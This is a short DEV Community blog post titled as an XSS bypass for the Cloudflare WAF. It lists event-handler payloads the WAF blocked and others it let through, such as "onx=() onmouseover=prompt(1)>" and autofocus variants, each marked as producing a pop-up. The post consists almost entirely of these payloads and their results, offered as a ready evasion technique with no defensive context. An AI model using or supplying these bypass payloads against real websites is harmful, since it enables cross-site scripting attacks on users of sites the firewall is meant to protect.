DEV Community

Hafiz Muhammad Attaullah
Hafiz Muhammad Attaullah

Posted on

XSS BYPASS HARD CLOUDFLARE WAF SOLUTION

Problems

Input : "//ONX=""//ONFOCUS=prompt()>
Respond : Blocked

Input : "%01onfocus=test>
Respond : blocked

Input : "%2501onfocus=>
Respond : blocked

Input : "test=[1].map(confirm)>
Respond : blocked

Input : "test=[1].map%26%2300000000000040;1)>
Respond : Blocked

.
.

Solutions :

Input : "onx=() onmouseover=prompt(1)>
Respond : pop up appears

Input : " onxXxxXXxXXXxx=() autofocus onmouseover=prompt(1)>
Respond : pop up appears

Input : "onx={} onmouseover=prompt(1)>
Respons : pop up appears

Input : "onx=[] onmouseover=prompt(1)>
Respond : pop up appears

Etc

Top comments (0)

Billboard image

The Next Generation Developer Platform

Coherence is the first Platform-as-a-Service you can control. Unlike "black-box" platforms that are opinionated about the infra you can deploy, Coherence is powered by CNC, the open-source IaC framework, which offers limitless customization.

Learn more

👋 Kindness is contagious

Please leave a ❤️ or a friendly comment on this post if you found it helpful!

Okay